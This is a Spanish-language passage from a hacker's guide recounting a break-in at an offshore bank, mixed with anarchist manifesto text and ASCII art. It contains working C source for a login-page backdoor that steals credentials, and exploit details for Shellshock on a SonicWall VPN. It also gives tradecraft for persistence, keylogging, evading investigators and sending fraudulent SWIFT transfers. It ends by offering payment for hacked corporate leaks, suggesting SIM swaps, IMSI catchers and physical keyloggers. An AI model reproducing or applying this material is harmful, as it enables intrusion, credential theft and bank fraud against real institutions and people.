VNC oculto (hvnc) después de que se hayan autenticado, o con un poco de creatividad también podrías enfocarte en otra parte de su proceso en lugar de enviar mensajes SWIFT directamente.Creo que si colaborase con otros hackers bancarios con experiencia podríamos hacernos cientos de bancos como Carnabak, en vez de estar haciendo uno de tanto en tanto por mi cuenta. Así que si tienes experiencia con hackeos similares y quieres colaborar, contactame. Encontrarás mi correo y mi llave PGP al final de la guía anterior [3].[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/ Exfiltration/Get-Keystrokes.ps1[2] https://lolbas-project.github.io/[3] https://www.exploit-db.com/papers/41914 ________________________________________/ Si robar un banco cambiara las cosas, \\ lo harían ilegal / ---------------------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `'--[ 3 - Tengan cuidado ahí fuera ]----------------------------------------------Es importante tomar algunas precauciones sencillas. Voy a remitirme a esta misma sección de mi última guía [1], ya que por lo visto funciona bien nomás[2]. Todo lo que tengo que añadir es que, en palabras de Trump, "A menos queatrapes a los hackers in fraganti, es rete-difícil determinar quién es queestaba realizando el hackeo", de modo que la policía se está volviendo más y más creativa [3][4] en sus intentos de agarrar a los criminales en el acto (cuando sus discos duros cifrados están desbloqueados). Así que estaría bueno si por ejemplo llevas encima un cierto dispositivo bluetooth y configuras tucomputadora para que se apague cuando se aleje más allá de un cierto rango, ocuando un acelerómetro detecta movimiento, o algo por el estilo.Puede que escribir artículos largos detallando tus acciones y tu ideología no sea la cosa más segura del mundo (¡ups!), pero a ratos siento que tenía quehacerlo. Si no creyera en quien me escucha Si no creyera en lo que duele Si no creyera en lo que quede Si no creyera en lo que lucha Que cosa fuera... ¿Que cosa fuera la maza sin cantera?[1] https://www.exploit-db.com/papers/41914[2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a- phineas-fisher.html[3] https://www.wired.com/2015/05/silk-road-2/[4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes- alphabay-arrest-video ,-\__ |f-"Y\ ____________________ \()7L/ | ¡Sé gay! | cgD | ¡Haz el crimen! | __ _ |\( --------------------- .' Y '>, \ \ \ / _ _ \ \\\ \ )(_) (_)(|} \\\ { 4A } / \\\ \uLuJJ/\l \\\ |3 p)/ \\\___ __________ /nnm_n// c7___-__,__-)\,__)(". \_>-<_/D //V \_"-._.__G G_c__.-__<"/ ( \ <"-._>__-,G_.___)\ \7\ ("-.__.| \"<.__.-" ) \ \ |"-.__"\ |"-.__.-".\ \ \ ("-.__"". \"-.__.-".| \_\ \"-.__""|!|"-.__.-".) \ \ "-.__""\_|"-.__.-"./ \ l ".__""">G>-.__.-"> .--,_ "" G Muchos culpan a las personas queer del declive de esta sociedad; estamos orgullosxs de ello Algunos creen que queremos reducir a cenizas esta civilización y su tejido moral; No podrían estar más en lo cierto Con frecuencia nos describen como depravadxs, decadentes y revoltosxs Pero ¡ay! No han visto nada todavíahttps://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime--[ 4 - Conseguir acceso ]------------------------------------------------------En otro lugar [1] les platicaba acerca de las vías principales para conseguiracceso inicial a la red de una compañía durante un ataque dirigido. Sin embargo,éste no era un ataque dirigido. No me propuse hackear un banco específico, loque quería era hackear cualquier banco, lo cual termina siendo una tarea muchomás sencilla. Este tipo de enfoque inespecífico fue popularizado por Lulzsec yAnonymous [2]. Como parte de [1], preparé un exploit y unas herramientas depost-explotación para un dispositivo de VPN popular. Luego me puse a escanear lainternet entera con zmap [3] y zgrab para identificar otros dispositivosvulnerables. Hice que el escaner guardara las IPs vulnerables, junto con el"common name" y los "alt names" del certificado SSL del dispositivo, los nombresde dominio de windows del dispositivo, y la búsqueda DNS inversa de la IP. Lehice un grep al resultado en busca de la palabra "banco", y había bastante paraelegir, pero la verdad es que me atrajo la palabra "Cayman", y fue así que vinea quedarme con este.[1] https://www.exploit-db.com/papers/41914[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png[3] https://github.com/zmap/zmap----[ 4.1 - El Exploit ]--------------------------------------------------------Cuando publiqué mi última guía DIY [1] no revelé los detalles del exploit desonicwall que había usado para hackear a Hacking Team, ya que era muy útil paraotros hackeos, como este mismo, y todavía no había acabado de divertirme con él.Determinada entonces a hackear a Hacking Team, pasé semanas haciendo ingenieríainversa a su modelo del ssl-vpn de sonicwall, e incluso conseguí encontrarvarias vulnerabilidades de corrupción de memoria más o menos difíciles deexplotar, antes de darme cuenta de que el dispositivo era fácilmente explotablecon shellshock [2]. Cuando salió shellshock, muchos dispositivos sonicwall eranvulnerables, sólo con una petición a cgi-bin/welcome, y un payload en eluser-agent. Dell sacó una actualización de seguridad y un advisory para estasversiones. La versión usada por Hacking Team y este banco tenía la versión debash vulnerable, pero las peticiones cgi no disparaban el shellshock excepto porlas peticiones a un shell script, y justo había uno accesible:cgi-bin/jarrewrite.sh. Esto parece que se les escapó a los de Dell en su nota,ya que nunca sacaron una actualización de seguridad ni un advisory para esaversión del sonicwall. Y, amablemente, Dell había hecho dos2unix setuid root,dejando un dispositivo fácil de rootear.En mi última guía muchos leyeron que pasé semanas investigando un dispositivo hasta dar con un exploit, y asumieron que eso significaba que yo era algún tipode hacker de élite. La realidad, es decir, el hecho de que me llevó dos semanasdarme cuenta de que era trivialmente explotable con shellshock, es tal vez menoshalagadora para mí, pero pienso que también es más inspiradora. Demuestra quede verdad tú puedes hacer esto por tí misma. No necesitas ser un genio, yociertamente no lo soy. En realidad mi trabajo contra Hacking Team comenzó unaño antes. Cuando descubrí a Hacking Team y al Grupo Gamma en lasinvestigaciones de CitizenLab [3][4], decidí explorar un poco y ver si podíaencontrar algo. No llegué a ninguna parte con Hacking Team, pero tuve suerte conGamma Group, y pude hackear su portal de atención al cliente con inyección sqlbásica y vulnerabilidades de subida de archivos [5][6]. Sin embargo, a pesar deque su servidor de soporte me daba un pivote hacia la red interna de GammaGroup, fui incapaz de penetrar mas allá en la compañía. A partir de estaexperiencia con el Grupo Gamma y otros hacks, me di cuenta de que estabarealmente limitada por mi falta de conocimiento sobre escalada de privilegios ymovimiento lateral en dominios windows, active directory y windows en general.Así que estudié y practiqué (ver sección 11), hasta que sentí que estaba listapara volver a hacerle una visita a Hacking Team casi un año después. La prácticadio sus frutos, y esa vez fui capaz de realizar un compromiso completo de lacompañía [7]. Antes de darme cuenta de que podía entrar con shellshock, estabadispuesta a pasar meses enteros feliz de la vida estudiando desarrollo deexploits y escribiendo un exploit confiable para una de las vulnerabilidades decorrupción de memoria que había encontrado. Sólo sabía que Hacking Teamnecesitaba ser expuesto, y que me tomaría tanto tiempo como fuese necesario yaprendería lo que tuviese que aprender para conseguirlo. Para realizar estoshacks no necesitas ser brillante. Ni siquiera necesitas un gran conocimientotécnico. Sólo necesitas dedicación, y creer en tí misma.[1] https://www.exploit-db.com/papers/41914[2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)[3] https://citizenlab.ca/tag/hacking-team/[4] https://citizenlab.ca/tag/finfisher/[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped- bahrain-track-arab-spring-protesters/[6] https://www.exploit-db.com/papers/41913[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam----[ 4.2 - El Backdoor ]-------------------------------------------------------Parte del backdoor que preparé para Hacking Team (véase [1], sección 6) era un wrapper sencillo sobre la página de login para capturar contraseñas:#include <stdio.h>#include <unistd.h>#include <fcntl.h>#include <string.h>#include <stdlib.h>int main(){ char buf[2048]; int nread, pfile; /* jala el log si mandamos una cookie especial */ char *cookies = getenv("HTTP_COOKIE"); if (cookies && strstr(cookies, "nuestra contraseña privada")) { write(1, "Content-type: text/plain\n\n", 26); pfile = open("/tmp/.pfile", O_RDONLY); while ((nread = read(pfile, buf, sizeof(buf))) > 0) write(1, buf, nread); exit(0); } /* el principal almacena los datos del POST y se los envía al hijo, que es el programa de login real */ int fd[2]; pipe(fd); pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600); if (fork()) { close(fd[0]); while ((nread = read(0, buf, sizeof(buf))) > 0) { write(fd[1], buf, nread); write(pfile, buf, nread); } write(pfile, "\n", 1); close(fd[1]); close(pfile); wait(NULL); } else { close(fd[1]); dup2(fd[0],0); close(fd[0]); execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin", "userLogin", NULL); }}En el caso de Hacking Team, se logueaban a la VPN con passwords de un solo uso,de modo que la VPN me dio acceso solamente a la red, y a partir de ahí me tomóun esfuerzo extra conseguir admin de dominio en su red. En la otra guía escribísobre pases laterales y escalada de privilegios en dominios windows [1]. En estecaso, en cambio, eran las mismas contraseñas de dominio de windows las que seusaban para autenticarse contra la VPN, así que pude conseguir un buen decontraseñas de usuarios, incluyendo la del admin de dominio. Ahora tenía totalacceso a su red, pero usualmente esta es la parte fácil. La parte más complicadaes entender cómo es que operan y cómo sacar el pisto.[1] https://www.exploit-db.com/papers/41914----[ 4.3 - Datos curiosos ]----------------------------------------------------Al seguir la investigación que hicieron sobre el hackeo, me resultó interesantever que, por la misma época en que yo lo hice, el banco pudo haber sidocomprometido por alguna otra persona mediante un email de phishing dirigido [1].Como dice el viejo dicho, "dale a una persona un exploit y tendrá acceso por undía, enséñale a phishear y tendrá acceso toda su vida" [2]. El hecho de quealguien más, por casualidad y al mismo tiempo que yo, se pusiera este bancopequeño en la mira (registraron un dominio similar al dominio real del bancopara poder enviar el phishing desde ahí) hace pensar que los hackeos bancariosocurren con mucha más frecuencia de lo que se conoce.Una sugerencia divertida para que puedas seguir las investigaciones de tus hackeos es tener un acceso de respaldo, uno que no vas a tocar a menos que pierdas el acceso normal. Tengo un script sencillo que espera comandos una vez al dia, o menos, sólo para mantener acceso a largo plazo en el caso de que bloqueen mi acceso regular. Luego tenía un powershell empire [3] llamando a casa con más frecuencia a una IP diferente, y usaba empire para lanzar meterpreter [4] contra una tercera IP, donde realizaba la mayor parte de mi trabajo. Cuando PWC se puso a investigar el hackeo, encontraron mi uso de empire y meterpreter y limpiaron esas computadoras y bloquearon esas IPs, pero no detectaron mi acceso de respaldo. PWC habia colocado dispositivos de monitoreo de red, para poder analizar el tráfico y ver si todavía había computadoras infectadas, de modo que no quería conectarme mucho a su red. Sólo lancé mimikatz una vez para obtener las nuevas contraseñas, y a partir de ahí pude seguir sus investigaciones leyendo sus correos en el outlook web access.[1] página 47, Project Pallid Nutmeg.pdf, en torrent[2] https://twitter.com/thegrugq/status/563964286783877121[3] https://github.com/EmpireProject/Empire[4] https://github.com/rapid7/metasploit-framework--[ 5 - Entender las Operaciones Bancarias ]------------------------------------Para entender cómo operaba el banco, y cómo podría sacar dinero, seguí las técnicas que resumí en [1], en la sección "13.3 - Reconocimiento Interno". Descargué una lista de todos los nombres de archivos, le hice un grep en busca de palabras como "SWIFT" y "transferencia", y descargué y leí todos los archivos con nombres interesantes. También busqué correos de empleados, pero de lejos la técnica más útil fue usar keyloggers y capturas de pantalla paraobservar cómo trabajaban los empleados del banco. No lo sabía por entonces, pero para esto windows trae una herramienta buenisima de monitoreo [2]. Como sedescribe en la técnica no. 5 del apartado 13.3 en [1], hice una captura de lasteclas pulsadas en todo el dominio (incluyendo los títulos de ventana), hice ungrep en busca de SWIFT, y encontré algunos empleados abriendo 'SWIFT AccessService Bureau - Logon'. Para esos empleados, corrí meterpreter como en [3], yusé el módulo post/windows/gather/screen_spy para tomar capturas de pantallacada 5 segundos, para observar cómo es que trabajaban. Estaban usando una appcitrix remota de la compañía bottomline [4] para acceder a la red SWIFT, dondecada mensaje de pago SWIFT MT103 tenía que pasar a través de tres empleados: unopara "crear" el mensaje, uno para "verificarlo", y otro para "autorizarlo". Comoya tenía todas sus credenciales gracias al keylogger, pude realizar confacilidad los tres pasos yo misma. Y por lo que sabía después de haberles vistotrabajar, no revisaban los mensajes SWIFT enviados, de modo que debería tenersuficiente tiempo para sacar el dinero de mis bank drops antes de que el bancose diera cuenta e intentara revertir las transferencias.[1] https://www.exploit-db.com/papers/41914[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr- remotely-with-metasploit/[3] https://www.trustedsec.com/blog/no_psexec_needed/[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services _________________________________________/ Quien roba a un ladrón, tiene cien años \\ de perdón. / ----------------------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `'--[ 6 - Enviar el dinero ]------------------------------------------------------No tenía mucha idea de lo que estaba haciendo, así que lo iba descubriendo por el camino. De algún modo, las primeras transferencias que envié salieron bien. Al día siguiente, la cagué enviando una transferencia a méxico que puso fin a mi diversión. Este banco enviaba sus transferencias internacionales a través de su cuenta corresponsal en Natwest. Había visto que la cuentacorresponsal para las transferencias en libras esterlinas (GBP) aparecía comoNWBKGB2LGPL, mientras que para las demás era NWBKGB2LXXX. La transferenciamexicana estaba en GBP, así que asumí que tenía que poner NWBKGB2LGPL comocorresponsal. Si lo hubiera preparado mejor habría sabido que el GPL en lugar deXXX señalaba que el pago se enviaría a través del Servicio de Pagos Rápidos delReino Unido, en lugar de como una transferencia internacional, lo que obviamentepues no va a funcionar cuando estás tratando de enviar dinero a méxico. Así queal banco le llegó un mensaje de error. El mismo día también traté de enviar unpago de £200k a UK usando NWBKGB2LGPL, que no se hizo porque 200k sobrepasaba ellímite de envío mediante pagos rápidos, y hubiera tenido que usar NWBKGB2LXXX envez. También recibieron un mensaje de error por esto. Leyeron los mensajes, loinvestigaron, y encontraron el resto de mis transferencias.--[ 7 - El botín ]--------------------------------------------------------------Por lo que escribo ya se harán una noción cabal de cuáles son mis ideales y aqué cosas les doy mi apoyo. Pero no quisiera ver a nadie en problemas legales por recibir fondos expropiados, así que ni una palabra más de para dónde se fue la lana. Sé que los periodistas probablemente van a querer poner algún número sobre cuántos dólares fueron distribuidos en este hackeo y otrosparecidos, pero prefiero no alentar nuestro perverso hábito de medir las acciones nomás por su valor económico. Cualquier acción es admirable si es que viene desde el amor y no desde el ego. Por desgracia los de arriba, los ricos ypoderosos, las figuras públicas, los hombres de negocios, la gente en posiciones"importantes", aquellos que nuestra sociedad más respeta y valora, esos se hancolocado donde están a base de actuar más desde el ego que desde el amor. Es enla gente sencilla, humilde e "invisible" en quien deberíamos fijarnos y aquienes deberíamos admirar.--[ 8 - Criptomonedas ]---------------------------------------------------------Redistribuir dinero expropiado a proyectos chileros que buscan un cambio social positivo sería más fácil y seguro si esos proyectos aceptaran donaciones anónimas vía criptomonedas como monero, zcash, o al menos bitcoin. Se entiende que muchos de esos proyectos tengan una aversión a las criptomonedas, ya que se parecen más a alguna extraña distopía hipercapitalista que a la economía social con la que soñamos. Comparto su escepticismo, pero pienso que resultan útiles para permitir donaciones y transacciones anónimas, al limitar lavigilancia y control gubernamentales. Igual que el efectivo, cuyo uso muchospaíses están tratando de limitar por la misma razón.--[ 9 - Powershell ]------------------------------------------------------------En esta operación, al igual en que en [1], hice mucho uso de powershell. Porentonces, powershell era super cool, podías hacer casi cualquier cosa quequisieras, sin detección de antivirus y con muy poco footprint forense. Ocurreque con la introducción del AMSI [2] el powershell ofensivo está de retirada.Hoy día el C# ofensivo es lo que está de subida, con heramientas como[3][4][5][6]. AMSI va a llegar a .NET para la 4.8, así que a las herramientas enC# probablemente todavía les queden un par de añitos antes de quedar anticuadas.Y entonces pues volveremos a usar C o C++, o tal vez Delphi vuelva a ponerse demoda. Las herramientas y técnicas específicas cambian cada pocos años, pero enel fondo no es tanto lo que cambia, hoy el hacking en esencia sigue siendo lamisma cosa que era en los 90s. De hecho todos los scripts de powershellempleados en esta guía y en la anterior [1] siguen siendo perfectamente usableshoy día, tras una pequeña ofuscación de tu propia cosecha.[1] https://www.exploit-db.com/papers/41914[2] https://medium.com/@byte_St0rm/ adventures-in-the-wonderful-world-of-amsi-25d235eb749c[3] https://cobbr.io/SharpSploit.html[4] https://github.com/tevora-threat/SharpView[5] https://www.harmj0y.net/blog/redteaming/ghostpack/[6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/ ___________________________/ Fo Sostyn, Fo Ordaag \\ Financial Sector Fuck Off / --------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `'--[ 10 - Torrent ]-------------------------------------------------------------- Privacidad para los débiles, transparencia para los poderosos.La banca offshore provee de privacidad frente a su propio gobierno a los ejecutivos, a los políticos y a los millonarios. Exponerles puede sonarhipócrita por mi parte, dado que por lo general estoy a favor de la privacidad yen contra de la vigilancia gubernamental. Pero la ley ya estaba escrita por ypara los ricos: protege su sistema de explotación, con algunos límites (como losimpuestos) para que la sociedad pueda funcionar y el sistema no colapse bajo elpeso de su propia avaricia. Así que no, no es lo mismo la privacidad para lospoderosos, cuando les permite evadir los limites de un sistema de por sídiseñado para darles privilegios; y la privacidad para los débiles, a quienesprotege de un sistema concebido para explotarles.Incluso a periodistas con la mejor de las intenciones les resulta imposibleestudiar una cantidad tan ingente de material y saber qué va a resultarrelevante para la gente en diferentes partes del mundo. Cuando filtré losarchivos de Hacking Team, entregué a The Intercept una copia de los correoselectrónicos con un mes de antelación. Encontraron un par de los 0days queHacking Team estaba usando, los reportaron previamente a MS y Adobe y publicaronunas cuantas historias una vez que la filtración se hizo pública. No hay puntode comparación con la enorme cantidad de artículos e investigación que vino trasla filtración completa al público. Viéndolo así, y considerando también la (no) publicación editorializada [1] de los papeles de panamá, pienso que unafiltración pública y completa de este material es la elección correcta.[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers- protect-western-1-from-panama-leak/Los psicólogos hallaron que los que están más abajo en las jerarquías tienden acomprender y a empatizar con aquellos en la cima, pero que lo contrario es menoscomún. Esto explica por qué, en este mundo sexista, muchos hombres bromean sobresu imposibilidad de entender a las mujeres, como si se tratara de un misterioirresoluble. Explica por qué los ricos, si es que se paran a pensar en quienesviven en la pobreza, dan unos consejos y unas "soluciones" tan ajenas a larealidad que dan ganas de reír. Explica por qué reverenciamos a los ejecutivoscomo valientes que asumen riesgos. ¿Qué es lo que arriesgan, más allá de suprivilegio? Si todos sus emprendimientos fracasan, tendrán que vivir y trabajarcomo el resto de nosotras. También explica por qué serán muchos los que acusende irresponsable y peligrosa a esta filtración sin tachaduras. Sienten el"peligro" sobre un banco offshore y sus clientes de forma mucho más intensa delo que sienten la miseria de aquellos desposeídos por este sistema injusto ydesigual. Y la filtración de sus finanzas, ¿es acaso un peligro para ellos, otan sólo para su posición en lo alto de una jerarquía que ni siquiera deberíaexistir? ,---------------------------------------------------. _,-._ | Nos vilifican, esos infames; cuando la única | ; ___ : | diferencia es que ellos roban a los pobres | ,--' (. .) '--.__ | amparados por la ley, lo sabe el cielo, y nosotros| _; ||| \ | saqueamos a los ricos bajo la única protección de | '._,-----''';=.____," | nuestro propio coraje. ¿No has de preferir ser | /// < o> |##| | uno de nosotros, antes que pordiosear ante esos | (o \`--' / villanos en busca de trabajo? | ///\ >>>> _\ <<<< //`---------------------------------------------------' --._>>>>>>>><<<<<<<< / ___() >>>[||||]<<<< `--'>>>>>>>><<<<<<< >>>>>>><<<<<< >>>>><<<<< >>ctr<< Capitán Bellamy --[ 11 - Aprende a hackear ]---------------------------------------------------- No se empieza hackeando bien. Empiezas hackeando mierda, pensando que es bueno, y luego poco a poco vas mejorando. Por eso siempre digo que una de las virtudes más valiosas es la persistencia. - Consejos de Octavia Butler para la aspirante a APTLa mejor forma de aprender a hackear es hackeando. Armate un laboratorio conmáquinas virtuales y empezá a probar cosas, tomándote un break para investigarcualquier cosa que no entiendas. Como mínimo vas a querer un servidor windowscomo controlador de dominio, otra vm windows normal unida al dominio, y unamáquina de desarrollo con visual studio para compilar y modificar herramientas.Intenta hacer un documento de office con macros que lancen meterpreter u otroRAT, y probá meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,psexec y otras técnicas de pase lateral [1]; así como los otros scripts,herramientas y técnicas mencionados en esta guía y en la anterior [2]. Alprincipio puedes deshabilitar windows defender, pero luego probalo todoteniéndolo activado [3][4] (pero desactivando el envío automático de muestras).Una vez que estés a gusto con todo eso, estarás lista para hackear el 99% de lascompañías. Hay un par de cosas que en algún momento serán muy útiles en tuaprendizaje, como desenvolverte cómodamente con bash y cmd.exe, un dominiobásico de powershell, python y javascript, tener conocimiento de kerberos [5][6]y active directory [7][8][9][10], y un inglés fluido. Un buen librointroductorio es The Hacker Playbook.Quiero también escribir un poco sobre cosas en las que no centrarse si no tequieres entretener sólo porque alguien te haya dicho que no eres una hacker "deverdad" si no sabes ensamblador. Obviamente, aprende lo que sea que te interese,pero escribo estas líneas pensando en aquellas cosas en las que te puedescentrar a fin de conseguir resultados prácticos si lo que buscas es hackearcompañías para filtrar y expropiar. Un conocimiento básico de seguridad enaplicaciones web [11] es útil, pero especializarte más en seguridad web no esrealmente el mejor uso de tu tiempo, a menos que quieras hacer una carrera enpentesting o cazando recompensas por bugs. Los CTFs, y la mayoría de losrecursos que encontrarás al buscar información sobre hacking, se centrangeneralmente en habilidades como seguridad web, ingeniería inversa, desarrollode exploits, etc. Cosas que tienen sentido entendiéndolas como una forma depreparar gente para las carreras en la industria, pero no para nuestrosobjetivos. Las agencias de inteligencia pueden darse el lujo de tener un equipodedicado a lo más avanzado en fuzzing, un equipo trabajando en desarrollo deexploits con un güey investigando exclusivamente las nuevas técnicas demanipulación del montículo, etc. Nosotras no tenemos ni el tiempo ni losrecursos para eso. Las dos habilidades de lejos más importantes para el hackingpráctico son el phishing [12] y la ingeniería social para conseguir accesoinicial, y luego poder escalar y moverte por los dominios windows.[1] https://hausec.com/2019/08/12/offensive-lateral-movement/[2] https://www.exploit-db.com/papers/41914[3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf[4] https://www.trustedsec.com/blog/ discovering-the-anti-virus-signature-and-bypassing-it/[5] https://www.tarlogic.com/en/blog/how-kerberos-works/[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/[7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/[9] https://adsecurity.org/[10] https://github.com/infosecn1nja/AD-Attack-Defense[11] https://github.com/jhaddix/tbhm[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an- external-engagement-through-spear-phishing/--[ 12 - Lecturas Recomendadas ]------------------------------------------------ __________________________________________/ Cuando el nivel científico de un mundo \| supera por mucho su nivel de solidaridad,|\ ese mundo se autodestruye. / ------------------------------------------ \ _.---._ . . * \.' '. ** _.-~===========~-._ . (___________________) . * .' \_______/ .' .' .' ' - AmiCasi todo el hacking hoy día se hace por hackers de sombrero negro, para su provecho personal; o por hackers de sombrero blanco, para el provecho de los accionistas (y en defensa de los bancos, compañías y estados que nos están aniquilando a nosotras y al planeta en que vivimos); y por militares y agencias de inteligencia, como parte de su agenda de guerra y conflictos. Viendo que este nuestro mundo ya está al límite, he pensado que, además de estosconsejos técnicos para aprender a hackear, debía incluir algunos recursos quehan sido muy importantes para mi desarrollo y me han guiado en el uso de misconocimientos de hacking.* Ami: El Niño de las Estrellas - Enrique Barrios * La Anarquía Funciona https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia- funciona* Viviendo Mi Vida - Emma Goldman* The Rise and Fall of Jeremy Hammond: Enemy of the State https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy- hammond-enemy-of-the-state-183599/ Este cuate y el hack de HBGary fueron una inspiración* Días de Guerra, Noches de Amor - Crimethinc* Momo - Michael Ende* Cartas a un joven poeta - Rilke* Dominion (Documental) "no podemos creer que, si no miramos, no sucederá lo que no queremos ver" - Tolstoy en Первая ступень* Bash Back!--[ 13 - Sanar ]----------------------------------------------------------------El mundo hacker tiene una alta incidencia de depresión, suicidios y ciertasbatallas con la salud mental. No creo que sea a causa del hacking, sino por laclase de ambiente del que en su mayoría provienen los hackers. Como muchashackers, crecí con escaso contacto humano: fui una niña criada por el internet.Tengo mis luchas con la depresión y el entumecimiento emocional. A Willie Suttonse le cita con frecuencia diciendo que robaba bancos porque "allí es donde estáel dinero", pero la cita es incorrecta. Lo que realmente dijo fue: ¿Por qué robaba bancos? Porque lo disfrutaba. Amaba hacerlo. Estaba más vivo cuando estaba dentro de un banco, en pleno atraco, que en cualquier otro momento de mi vida. Lo disfrutaba tanto que una o dos semanas después ya estaba buscando la siguiente oportunidad. Pero para mí el dinero era una minucia, nada más.El hacking me ha hecho sentir viva. Comenzó como una forma de automedicar ladepresión. Más tarde me di cuenta de que, en realidad, podía servir para haceralgo positivo. No me arrepiento para nada de la forma en que crecí, trajo variasexperiencias hermosas a mi vida. Pero sabía que no podía continuar viviendo deesa manera. Así que comencé a pasar más tiempo alejada de mi computadora, conotras personas, aprendiendo a abrirme al mundo, a sentir mis emociones, aconectar con los demás, a aceptar riesgos y ser vulnerable. Cosas mucho másdifíciles que hackear, pero a la mera hora la recompensa vale más la pena. Aúnme supone un esfuerzo, pero aunque sea de forma lenta y tambaleante, siento quevoy por buen camino.El hacking, hecho con conciencia, también puede ser lo que nos sana. Según lasabiduría maya, tenemos un don otorgado por la naturaleza, que debemoscomprender para ponerlo al servicio de la comunidad. En [1], se explica: Cuando una persona no acepta su trabajo o misión empieza a padecer enfermedades, aparentemente incurables; aunque no llega a morir en corto tiempo, sino únicamente sufre, con el objetivo de despertar o tomar conciencia. Por eso es indispensable que una persona que ha adquirido los conocimientos y realiza su trabajo en las comunidades debe pagar su Toj y mantener una comunicación constante con el Creador y su ruwäch q’ij, pues necesita constantemente de la fuerza y energía de estos. De lo contrario, las enfermedades que lo hicieron reaccionar o tomar el trabajo podrían volver a causar daño.Si sientes que el hacking está alimentando tu aislamiento, depresión, u otrospadecimientos, respira. Date un tiempo para conocerte y tomar conciencia. Vosmereces vivir feliz, con salud y plenitud. ________________________< All Cows Are Beautiful > ------------------------ \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `'[1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748--[ 14 - El Programa Hacktivista de Caza de Bugs ]------------------------------Me parece que hackear para conseguir y filtrar documentos de interés público esuna de las mejores maneras en que lxs hackers pueden usar sus habilidades enbeneficio de la sociedad. Por desgracia para nosotras las hackers, como en casitodo rubro, los incentivos perversos de nuestro sistema económico no coincidencon aquello que beneficia a la sociedad. Así que este programa es mi intento dehacer posible que lxs buenxs hackers se puedan ganar la vida de forma honestaponiendo al descubierto material de interés público, en vez de tener que andarvendiendo su trabajo a las industrias de la ciberseguridad, el cibercrimen o laciberguerra. Entre algunos ejemplos de compañías por cuyos leaks me encantaríapagar están las empresas mineras, madereras y ganaderas que saquean nuestrahermosa América Latina (y asesinan a las defensoras de la tierra y el territorioque tratan de detenerles), empresas involucradas en ataques a Rojava como BaykarMakina o Havelsan, compañías de vigilancia como el grupo NSO, criminales deguerra y aves de rapiña como Blackwater y Halliburton, empresas penitenciariasprivadas como GeoGroup y CoreCivic/CCA, y lobbistas corporativos como ALEC.Presta atención a la hora de elegir dónde investigas. Por ejemplo, es bienconocido que las petroleras son malvadas: se enriquecen a costa de destruir elplaneta (y allá por los 80s las propias empresas ya sabían de las consecuenciasde su actividad [1]). Pero si les hackeas directamente, tendrás que bucear entreuna increíble cantidad de información aburridísima acerca de sus operacionescotidianas. Muy probablemente te va a ser mucho más fácil encontrar algointeresante si en cambio te enfocas en sus lobbistas [2]. Otra manera deseleccionar objetivos viables es leyendo historias de periodistas deinvestigación (como [3]), que son interesantes pero carecen de evidenciassólidas. Y eso es exactamente lo que tus hackeos pueden encontrar.Pagaré hasta 100 mil USD por cada filtración de este tipo, según el interés público e impacto del material, y el laburo requerido en el hackeo. Sobra decirque una filtración completa de los documentos y comunicaciones internas dealguna de estas empresas supondrá un beneficio para la sociedad que sobrepasaesos cien mil, pero no estoy tratando de enriquecer a nadie. Sólo quiero proveerde fondos suficientes para que las hackers puedan ganarse la vida de forma dignahaciendo un buen trabajo. Por limitaciones de tiempo y consideraciones deseguridad no voy a abrir el material, ni a inspeccionarlo por mí misma, sino queleeré lo que la prensa diga al respecto una vez se haya publicado, y haré unaestimación del interés público a partir de ahí. Mi información de contacto estáal final de la guía mencionada antes [4].Cómo obtengas el material es cosa tuya. Puedes usar las técnicas tradicionales de hacking esbozadas en esta guía y la anterior [4]. Podrías hacerle una simswap [5] a un empresario o politiquero corrupto, y luego descargar sus correos ybackups desde la nube. Puedes pedir un IMSI catcher de alibaba y usarlo afuerade sus oficinas. Puedes hacer un poco de war-driving (del antiguo o del nuevo[6]). Puede que seas una persona dentro de sus organizaciones que ya tieneacceso. Puedes optar por un estilo low-tech tipo old-school como en [7] y [8], ysencillamente colarte en sus oficinas. Lo que sea que te funcione.[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/ sep/19/shell-and-exxons-secret-1980s-climate-change-warnings[2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/[3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/[4] https://www.exploit-db.com/papers/41914[5] https://www.vice.com/en_us/article/vbqax3/ hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin[6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse- is-my-keyboard/[7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI[8] https://en.wikipedia.org/wiki/Unnecessary_Fuss----[ 14.1 - Pagos parciales ]--------------------------------------------------¿Eres una camarera de buen corazón que trabaja en una compañía del mal [1]?¿Estarías dispuesta a introducir sigilosamente un keylogger físico en lacomputadora de un ejecutivo, a cambiar su cable de carga USB por uno modificado[2], esconder un micro en alguna sala de reuniones donde planean 